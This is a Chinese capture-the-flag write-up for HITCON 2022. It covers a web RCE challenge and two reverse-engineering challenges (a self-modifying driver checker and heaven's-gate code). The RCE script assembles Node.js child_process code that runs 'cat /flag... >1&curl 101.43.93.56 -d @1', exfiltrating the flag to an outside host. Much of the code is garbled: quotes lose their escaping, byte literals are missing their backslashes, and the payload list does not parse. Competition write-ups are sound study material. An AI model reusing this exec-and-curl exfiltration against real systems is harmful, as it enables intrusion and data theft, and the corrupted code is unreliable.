2022HITCON WriteUp by Mini-Venom(招新)


2022HITCON WriteUp by Mini-Venom(招新)

招新小广告CTF组诚招re、crypto、pwn、misc、合约方向的师傅,长期招新IOT+Car+工控+样本分析多个组招人有意向的师傅请联系邮箱[email protected](带上简历和想加入的小组)

Web

RCE

解题思路

import requests
import urllib.parse
import re
from multiprocessing.pool import ThreadPool
import binascii

target_url = 'http://24fhhiuetp.rce.chal.hitconctf.com'  # challenge instance used in this write-up
# Lookbehind on "s:" inside the URL-decoded "code" cookie; the pieces that
# re.findall() returns are joined back into one string in brute_force().
REGEX = '(?<=s:).*?(?=.)'
# One requests session shared by every worker thread (see the ThreadPool in main).
s = requests.session()
# Statements the author submits to the challenge, one list entry each; they are
# hex-encoded below and matched prefix by prefix in brute_force().
# NOTE(review): the inner single quotes lost their escaping when the page was
# extracted (e.g. 'global.a1  = 'child''), so this literal does not parse as shown.
original_payloads = ['global.a1  = 'child'',
                    'a1 = a1 + '_process'',
                    'global.b=require(a1)',
                    'global.c1 =       ''' ,
                    'c1=c1+'cat /flag-1e'',
                    'c1=c1+'5657085ea974'',
                    'c1=c1+'db77cdef03cc'',
                    'c1=c1+'5753833fea16'',
                    'c1=c1+          '68'',
                    'c1=c1+'>1&curl 101.'',
                    'c1=c1+'43.93.56    '',
                    'c1=      c1+' -d @1'',
                    '          b.exec(c1)']


# Hex form of each statement: this is what brute_force() compares against the cookie.
hex_payloads = [i.encode("utf-8").hex() for i in original_payloads]
# Filled by the worker threads: "<decoded statement> : <final cookie>" per payload.
exploit_payloads = []

def init_attack():
    """Warm up the shared session with one GET to the target.

    Whatever cookies that response sets on `s` are what brute_force() reads
    as its starting "code" cookie.
    """
    s.get(target_url)
    # print(s.cookies.get("code"))  # handy for checking the initial cookie
def brute_force(payload):
    """Match `payload` (a hex string) prefix by prefix against the cookies the challenge returns.

    Each GET to /random yields a fresh "code" cookie.  The text REGEX extracts
    from the decoded cookie is compared with the next-longer prefix of
    `payload`; when they agree, that response's cookie becomes the starting
    cookie for the next request and the prefix grows by one character.
    When the whole payload has been matched, a "<decoded payload> : <cookie>"
    entry is appended to the module-level `exploit_payloads` list.

    Args:
        payload: one entry of hex_payloads.

    Returns:
        None.  Results go to exploit_payloads and stdout.
    """
    count = 1  # length of the prefix being matched next
    tmp_cookie = s.cookies.get("code")  # starting point set by init_attack()
    while True:
        # Every request is routed through a local proxy at 127.0.0.1:8080; with
        # nothing listening there, requests raises ProxyError on this line.
        # NOTE(review): no timeout is passed, so a stalled server hangs this worker.
        res = requests.get(target_url+'/random',cookies={'code':tmp_cookie}, proxies={'http':'127.0.0.1:8080'})
        # NOTE(review): a response without a "code" cookie makes get() return
        # None and unquote() raise TypeError.
        cookies = urllib.parse.unquote(res.cookies.get("code"))
        cookies = ''.join(re.findall(REGEX, cookies))
        tmp = payload[:count]
        if(tmp==cookies):
            tmp_cookie = res.cookies.get("code")
            count += 1
            print(cookies)
        elif (count==len(payload)+1):
            # Only exit from the loop: the full payload was matched on a previous
            # iteration and this iteration's cookie did not match it.
            # NOTE(review): if the cookie equals the full payload once more while
            # count == len(payload)+1, the first branch bumps count past that
            # value and this equality can never hold again -> endless loop.
            break
        else:
            continue
    # str() of a bytes object gives its repr (b'...'), not decoded text.
    exploit_payloads.append( str(binascii.unhexlify(payload)) + " : " + tmp_cookie)
    print(payload + " : " + tmp_cookie)



if __name__ == '__main__':
    init_attack()
    pool = ThreadPool(10)  # ten workers, all sharing the one requests session `s`
    pool.map(brute_force, hex_payloads)  # one worker call per hex-encoded statement
    pool.close()
    pool.join()
    # Entries were appended in completion order, which need not be list order.
    print(exploit_payloads)

Reverse

checker

解题思路
检查部分

switch ( CurrentIrpStackLocation->Parameters.Read.ByteOffset.LowPart )
      {
        case 0x222000u:
          sub_1400014D0(0);
          byte_140013190[0] = 1;
          break;
        case 0x222010u:
          sub_1400014D0(32u);
          byte_140013191 = 1;
          break;
        case 0x222020u:
          sub_1400014D0(64u);
          byte_140013192 = 1;
          break;
        case 0x222030u:
          sub_1400014D0(96u);
          byte_140013193 = 1;
          break;
        case 0x222040u:
          sub_1400014D0(128u);
          byte_140013194 = 1;
          break;
        case 0x222050u:
          sub_1400014D0(160u);
          byte_140013195 = 1;
          break;
        case 0x222060u:
          sub_1400014D0(192u);
          byte_140013196 = 1;
          break;
        case 0x222070u:
          sub_1400014D0(224u);
          byte_140013197 = 1;
          break;
        case 0x222080u:
          if ( !Length )
            goto LABEL_15;
          v7 = 1;
          v8 = 0i64;
          while ( byte_140013190[v8] )
          {
            if ( ++v8 >= 8 )
              goto LABEL_21;
          }
          v7 = 0;
LABEL_21:
          if ( v7 )
          {
            v9 = dword_140003000 - 0x63746968;
            if ( dword_140003000 == 0x63746968 )
              v9 = (unsigned __int16)word_140003004 - 0x6E6F;
            **(_BYTE **)(a2 + 24) = v9 == 0;
          }
          else
          {
LABEL_15:
            **(_BYTE **)(a2 + 24) = 0;
          }
          break;

大概就是这些值都要过一遍,并且最后要和两个值相等(hitcon)。上面有个函数sub_1400014D0(0),里面进行了一些xor变换。然后看驱动入口,除了注册上面的major function外,还有如下:

PhysicalAddress = MmGetPhysicalAddress((char *)sub_140001490 + 0x1B70);// 0x140003000
  qword_140013170 = (char *)MmMapIoSpace(PhysicalAddress, 0x1000ui64, MmNonCached);
  qword_140013178 = (__int64)(qword_140013170 + 0x30);// 0x140003030
  v5 = MmGetPhysicalAddress((char *)sub_140001490 - 96);// 140001430
  qword_140013188 = (char *)MmMapIoSpace(v5, 0x1000ui64, MmNonCached);
  qword_140013180 = qword_140013188 + 0x700;    // 0x140001b30

可以发现,这里地址其中之一就是某个操作函数的地址,实际上就是自修改代码,必须输入正确的序列才能得到正确的代码

d_0x140001b30=b'x80xe9"x80xf1xadx0fxb6xc1kxc8x11xb8x9ex00x00x00*xc1xc3' # xor_sub
d_0x140001430=b'@SHx83xec Hx8bx05;x0cx00x00Hx8bxdaHx8bJx10H9x08u7Hx8bJx08xffx15x1d'
xor_d=b"x19xbcx8fx82xd0,a4xc0x9fxf6Pxd5xfbx0cnxd0xebxe5xe3xcexb5LxcaExaax11xb2>bo}xd0xebxa9xe3xb2/x06G|(xc5xdexdex1aNxd6xd8-x93Ox82edxfdx08bKx87~RG0xb7xbaxd09hSPxab xd5xcax84&qox91x1b6Fx11xa5xf1NXltxd4x9cx15xe2(xd5xd9x0f=x83xf3xfcxd1x13x1abx12@xaaxeaxcdxcbxe1xc6x08x81x98xf6hx88xbe#xb5x9eUxb9xe2}Zxda9x07xf0.2 YVLxb4x8f>x07axd9x0f-axf1x913x14xcbIhxfex1fxd4x8axfexe1xc6x18cx9ax9bx8ax8ax7fx08xc3xe8xe1xecx0bx8f;x00x94xa5x11xe7Gfxc4x9fx98x18pxf00xf6x94qxb1x95xd1xf0oxb7xd9=x05x9exc1S3vx9bKixcaxdexfd}gxb8)+xc7xc5x84,xd1x87x87xf1x98x97txadK2xf0JQrxeatxf78xfd'xbdx1cRqCx95x9cx1ax86xf2xc0xf9xf8"
c=b'c`xa5xb9xffxfc0nHxbbxfexfe2,nxd6xe6xfexfe2,nxd6xbbJJ2,xfcxffnxfdxbbxfe,xb9cxd6xb9bxd6nO'
from unicorn import *
import unicorn.x86_const as uc
import itertools as it
import capstone as cp
def xor_sub(a1):
    """Byte transform the author pairs with the code block at d_0x140001b30.

    Computes -98 - 17 * ((a1 - 34) ^ 0xAD) and reduces it to one byte.
    Reducing modulo 256 gives the same result as the original
    `(... + 0x100000000) & 0xff`, also for negative intermediates, because
    Python's `&` on negative ints is two's-complement.
    """
    mixed = (a1 - 34) ^ 0xAD
    return (-98 - 17 * mixed) % 256
def disasm(code):
    """Print every instruction of `code` decoded as 32-bit x86 starting at address 0.

    NOTE(review): this decodes in CS_MODE_32 while exe() below runs the same
    bytes under UC_MODE_64; instructions whose encoding differs between the
    two modes would be shown differently from how they execute.
    """
    engine = cp.Cs(cp.CS_ARCH_X86, cp.CS_MODE_32)
    for insn in engine.disasm(code, 0):
        print(insn)
def exe(code, data, end=0x13):
    """Run `code` under Unicorn (x86-64) with RCX = `data` and return RAX.

    The code is mapped at address 0 and execution stops when it reaches
    offset `end`.  A second 1 MiB region at 0x100000 serves as the stack;
    RSP is pointed at its last byte.

    Args:
        code: raw machine code bytes.
        data: value loaded into RCX before the run.
        end: stop address relative to the code base.

    Returns:
        The value of RAX when emulation stops.
    """
    code_base = 0
    stack_base = 0x100000
    region = 1024 * 1024
    emu = Uc(UC_ARCH_X86, UC_MODE_64)
    for region_start in (code_base, stack_base):
        emu.mem_map(region_start, region)
    emu.mem_write(code_base, code)
    emu.reg_write(uc.UC_X86_REG_RSP, stack_base + region - 1)
    emu.reg_write(uc.UC_X86_REG_RCX, data)
    emu.emu_start(code_base, code_base + end)
    return emu.reg_read(uc.UC_X86_REG_RAX)
def check(seq):
    """Replay the patch sequence `seq` over the dumped code and print the transformed buffer.

    The working code buffer starts as d_0x140001b30 with the first 32 bytes of
    d_0x140001430 XORed in, wrapping every 16 bytes.  For each (j, e) in `seq`
    the 32-byte slice xor_d[j*32:j*32+32] is used: its first 16 bytes are
    XORed into the code before the run, every byte of the module-level `c`
    is pushed through exe(code, byte, e), and its last 16 bytes are XORed in
    afterwards.  Prints bytes() of the final buffer; returns None.

    Args:
        seq: list of (slice index, stop offset) pairs.
    """
    buf = list(c)
    code = list(d_0x140001b30)
    for i in range(32):
        code[i % 16] ^= d_0x140001430[i]
    for slice_idx, stop in seq:
        key = xor_d[slice_idx * 32:slice_idx * 32 + 32]
        for i in range(16):
            code[i] ^= key[i]
        buf = [exe(bytes(code), value, stop) for value in buf]
        for i in range(16):
            code[i] ^= key[i + 16]
    print(bytes(buf))
# (slice index, stop offset) pairs; per the author these were found by
# repeatedly disassembling the patched code until valid instructions and a
# sensible end offset appeared.
seq=[(7,0xd),(2,6),(6,0xd),(0,0x3),(1,0x3),(4,0xc),(3,0x9),(5,0xd)]
check(seq)

Meow

解题思路
一眼天堂之门
dump出code后保存成单个二进制文件,使用IDA单独分析特征。一般这么多函数的肯定有公共特征

c=b"x96Pxcf,xebx9bxaaxfbSxabsxddlx9exdbxbcxeexab#xd6x16xfdxf1xf0xb9uxc3(xa2t}xe3'xd5x95\xf5vuxc9x8cxfbBx0exbdQxa2x98"
codes=b'j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xbagx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1/gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00Usage: %s <flag>nx00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xcdgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00Wrong lengthnx00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xf6gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x9fgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00Wrongnx00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xd0gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00I know you know the 
flag!nx00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1"gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xf7gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xd0gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x1fgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xa8gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1=gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xc7gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xa5gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Ggx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1hgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe
8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xd7gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Jgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x96gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x91gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1.gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x19gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xc5gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xe3gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x88gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xbdgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00
x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ngx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1x93gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x13gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xf1gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xccgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ggx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xabgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1xc9gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Hgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1+gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcb
H1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1tgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1Pgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ogx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xe9gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xc0gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1^gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xefgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x8bgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1x85gx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00x00x00x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1xcbgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6x80
xbcx00x00x00gx8bL$x1cx83xe0pgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14gx02x0ex80xf1Ugx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00j3xe8x00x00x00x00x83x04$x05xcbH1xc0eHx8b@`Hx0fxb6@x02gx8bL$x1cgx89x01x85xc0ux18gx8b|$x04gx8bt$x0cgx8bL$x14g*x0ex80xf1pgx88x0fxe8x00x00x00x00xc7D$x04#x00x00x00x83x04$rxcbxc3x00x00x00x00'
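# Address the dump was taken from; not referenced by the code below.
base = 0x4031c0
# Bytes that open every gadget in `codes`.  The page's literal had lost its
# "\x" escapes (b'x6ax33xe8...'), so the value is rebuilt here from those hex
# digits in the same bytes.fromhex() form used for `tail`.  Decoded as x86 it
# reads push 0x33 / call $+5 / add dword [esp], 5 / retf -- the far-return
# mode switch the write-up refers to as heaven's gate.
head = bytes.fromhex("6a33e80000000083042405cb")
# Bytes that close every gadget: call $+5 / mov dword [rsp+4], 0x23 /
# add dword [rsp], 0xd / retf / ret.
tail = bytes.fromhex("e800000000c7442404230000008304240dcbc3")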

import capstone as cp
def disasm(code, p=True):
    """Disassemble `code` as 64-bit x86 from address 0.

    Args:
        code: raw machine code bytes.
        p: when true, print every instruction before returning.

    Returns:
        A fresh Capstone instruction generator over `code` (a second pass;
        the printed one is not reused).
    """
    engine = cp.Cs(cp.CS_ARCH_X86, cp.CS_MODE_64)
    if p:
        for insn in engine.disasm(code, 0):
            print(insn)
    return engine.disasm(code, 0)

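def find_addr(codes: bytes, head_pat=None, tail_pat=None):
    """Locate every gadget in `codes` framed by a head and a tail byte pattern.

    Args:
        codes: the dumped code blob to scan.
        head_pat: bytes that open a gadget; defaults to the module-level `head`.
        tail_pat: bytes that close a gadget; defaults to the module-level `tail`.

    Returns:
        A list of (start, end) offsets: `start` is where a head occurrence
        begins and `end` is where the following tail begins, so
        codes[start:end] is the gadget without its tail.  Scanning resumes
        right after that tail.  A head with no tail after it ends the scan
        instead of producing a span that ends one byte before it starts.
    """
    head_pat = head if head_pat is None else head_pat
    tail_pat = tail if tail_pat is None else tail_pat
    addrs = []
    pos = 0
    while True:
        # find() with a start offset avoids copying the remainder of the blob
        # on every iteration.
        st = codes.find(head_pat, pos)
        if st == -1:
            break
        en = codes.find(tail_pat, st)
        if en == -1:
            break
        addrs.append((st, en))
        pos = en + len(tail_pat)
    return addrs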
def get_xor_data(code):
    """Return the last operand of the first `xor` in `code` that does not touch rax, parsed as hex.

    Returns None when no such instruction exists.  The operand text after
    the final comma is handed to int(..., base=16), so a non-immediate
    operand would raise ValueError.
    """
    for insn in disasm(code, p=False):
        if insn.mnemonic != 'xor' or 'rax' in insn.op_str:
            continue
        last_operand = insn.op_str.split(',')[-1]
        return int(last_operand, base=16)
    return None
def get_op(code):
    """Classify a gadget by the mnemonic three instructions before its end.

    Returns 1 for `add` and 2 for `sub`.  Any other mnemonic prints the full
    mnemonic list and terminates the process via exit().  Fewer than three
    instructions raises IndexError.
    """
    mnemonics = [insn.mnemonic for insn in disasm(code, False)]
    kind = {'add': 1, 'sub': 2}.get(mnemonics[-3])
    if kind is None:
        print(mnemonics)
        exit()
    return kind
addrs=find_addr(codes)
# One additive constant per byte of `c`; how the author obtained these is not
# shown in the write-up.
add_data=[196,22,142,119,5,185,13,107,36,85,18,53,118,231,251,160,218,52,132,180,200,155,239,180,185,10,87,92,254,197,106,115,73,189,17,214,143,107,10,151,171,78,237,254,151,249,152,101]

# Per gadget: the xor immediate and whether its arithmetic step is add (1) or sub (2).
# NOTE(review): the loop below assumes one gadget per byte of c; fewer
# gadgets than len(c) raises IndexError on xor_data[i] / op[i].
xor_data=[get_xor_data(codes[st:en]) for st,en in addrs]
op=[get_op(codes[st:en]) for st,en in addrs]
# get_op(codes[addrs[0][0]:addrs[0][1]])
# Undo each gadget's transform.  Note the precedence: `+ 0x100` is applied
# before `& 0xff`, i.e. the whole (xor'd byte -/+ constant + 0x100) is
# reduced to one byte.
f=[0]*len(c)
for i in range(len(c)):
    if op[i]==1:
